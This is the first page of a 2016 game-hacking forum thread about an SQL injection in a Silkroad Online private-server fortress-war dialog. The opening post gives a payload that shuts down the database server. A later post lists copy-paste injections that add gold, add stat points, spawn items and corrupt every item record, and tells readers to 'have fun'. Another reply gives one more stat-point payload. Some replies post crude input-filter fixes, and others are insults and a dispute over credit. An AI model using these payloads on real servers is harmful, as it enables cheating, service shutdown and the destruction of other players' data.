[INFORMATION] SQL Injection (ingame)

Page 1 of 6

09/05/2016 21:12 Syloxx#1

Hello Elitepvpers,

I just want to inform you that i discovered a new very harmful exploit.

It is possible to execute a SQL Injection through the Fortresswar Administrator NPC with the "About Guild" dialog.

Requirements:

Quote:

-own a fortresswar
-be the Guild Master

example:

Code:

test' shutdown--

this example will shutdown the sql server

Screenshot:

[Only registered and activated users can see links. Click Here To Register...]

09/05/2016 21:43 Goofie#2

Fix for packet filters

PHP Code:


			
            #region 0x705E_CLIENT_EXPLOIT

            if(_pck.Opcode == 0x705E)

            {

                string message = _pck.ReadAscii();

                if(message.Contains("'"))

                {

                    //message;

                    continue;

                } else if(message.Contains("\""))

                {

                    //message;

                    continue;

                } else if(message.Contains("-"))

                {

                    //message;

                    continue;

                }

            }

            #endregion

09/05/2016 22:33 timoman#3

thanks Goofie

09/05/2016 22:33 Exo#4

Quote:

Originally Posted by Goofie

Fix for packet filters

Spoiler

PHP Code:

#region 0x705E_CLIENT_EXPLOIT if(_pck.Opcode == 0x705E) { string message = _pck.ReadAscii(); if(message.Contains("'")) { //message; continue; } else if(message.Contains("\"")) { //message; continue; } else if(message.Contains("-")) { //message; continue; } } #endregion

PHP Code:


			
if (new[] { '-','\\','\'' }.Any(a => message.Contains(a)))
{
    //message; 
    continue;
}

short qode, qood qode. Also, I think SQL parsers are better for analyzing such strings.

09/06/2016 00:53 OutlawNL#5

Doesn't work on sro-r alteast hihi

09/06/2016 01:06 Exelja#6

Quote:

Originally Posted by OutlawNL

Doesn't work on sro-r alteast hihi

Or you just messed up when trying it :D

09/06/2016 05:54 Tazdingo7#7

Credits for the pic (? xD

Some funny sql injections you can do without any error at gameserver:

1. Add Gold to your character
a'; UPDATE _Char SET RemainGold = 99999999999 WHERE CharName16 = 'YourName'; UPDATE _SiegeFortress SET Introduction = 'a

2. Add more stats to your character
a'; UPDATE _Char SET RemainStatPoint = 99999 WHERE CharName16 = 'YourName'; UPDATE _SiegeFortress SET Introduction = 'a

3. If you know the item codes, why not create some of them?
a'; exec _ADD_ITEM_EXTERN 'Charname','ITEM_EU_TSWORD_11_SET_A_RARE',0,20; UPDATE _SiegeFortress SET Introduction = 'a

If you want to fuck off the database(dont do it if you are not the server admin, ok no):
a'; UPDATE _Items SET RefItemID = 0; UPDATE _SiegeFortress SET Introduction = 'a

Just copy & paste this injections to the fortress dialog.

Have fun.

09/06/2016 07:24 sarkoplata#8

just another simple reason to use the beautiful BR files

09/06/2016 10:05 Syloxx#9

Quote:

Originally Posted by WickedNite.

You fucking leecher.

Really? You discovered? Go fuck yourself.

Yes, i discovered them by my Self by checking the GameServer Logs.
A Guild Master wrote "we're".

Just because MegaMax said he told me that doesnt means its true (actually i was unsure so i checked the whole Skype history and i couldn't find anything about an sql injection)

So if u think to Talk about shit without even asking the other side go fuck your self

Srsly that's Camel Level: "I have no clue what's up but I am a fanboy of Mega so it must be true!"

Pff shame on you

09/06/2016 10:26 MeGaMaX#10

Quote:

Originally Posted by Syloxx

Yes, i discovered them by my Self by checking the GameServer Logs.
A Guild Master wrote "we're".

Just because MegaMax said he told me that doesnt means its true (actually i was unsure so i checked the whole Skype history and i could find anything about an sql injection)

So if u think to Talk about shit without even asking the other side go fuck your self

Srsly that's Camel Level: "I have no clue what's up but I am a fanboy of Mega so it must be true!"

Pff shame on you

"(actually i was unsure so i checked the whole Skype history and i could find anything about an sql injection)"

^ how if you blocked me from skype yourself.

Srsly ? it was on discord epvp #main channel before you quit it, i wrote it public and you said you will check it, i said ok. But look i dont wanna be rude because there is no reason to, but if you are going to force me to be it wont go to any good level.

You are the one who on Srsly that's Camel Level: :cool:
[Only registered and activated users can see links. Click Here To Register...]

Shame on you Syloox never thought you will be owed by anyone or because he did vsro 274 bot for you ? :rolleyes:

09/06/2016 10:44 Syloxx#11

Quote:

Originally Posted by MeGaMaX.

"(actually i was unsure so i checked the whole Skype history and i could find anything about an sql injection)"

^ how if you blocked me from skype yourself.

Srsly ? it was on discord epvp #main channel before you quit it, i wrote it public and you said you will check it, i said ok. But look i dont wanna be rude because there is no reason to, but if you are going to force me to be it wont go to any good level.

You are the one who on Srsly that's Camel Level: :cool:
[Only registered and activated users can see links. Click Here To Register...]

Shame on you Syloox never thought you will be owed by anyone or because he did vsro 274 bot for you ? :rolleyes:

1st of all I never blocked u all I just removed u from contacts, because we weren't active talking anymore (I like to clean up my Skype contacts periodically)
2nd skype history is stored on my iPhone
3rd I report that to Weeman because a friend of mine uses his Filter.
4th about Discord I was there only once for maybe 15mins and I didn't even communicate with you there.

So if you are 100% sure I wrote it then someone just used my name (for that 15 min I didn't even had Syloxx as name I had smt like "SpidyForceMeToBeHere")

09/06/2016 11:19 rares495#12

Seriously who cares about who found it? Important thing is that it's known and will be fixed.

09/06/2016 14:09 Hedgehock#13

Creating new instance of LogWriter on every call ? DAFAQ.
Also, u can return after executing CleanClient

09/06/2016 15:08 Gidzy#14

[Only registered and activated users can see links. Click Here To Register...]
:D ?

09/06/2016 16:50 tschulian#15

Quote:

Originally Posted by Hedgehock

Creating new instance of LogWriter on every call ? DAFAQ.
Also, u can return after executing CleanClient

Yeah this was the first hotfix (disconnecting the exploiter).
I rewrote it to replacing the corresponding strings to *.

About the logwriter: indeed its newly created, but guess how often some1 uses the about guild function? ;)
Its used that less that it took about 8 years to find that leak which makes sql injections possible. so, sorry du Model :*

Quote:

Originally Posted by Gidzy

[Only registered and activated users can see links. Click Here To Register...]
:D ?

You messed something up.
Check your Code again.

Code:

test'; update _Char set RemainStatPoint = 999 where CharName16 = 'yourCharnameHere';--

Page 1 of 6

Last »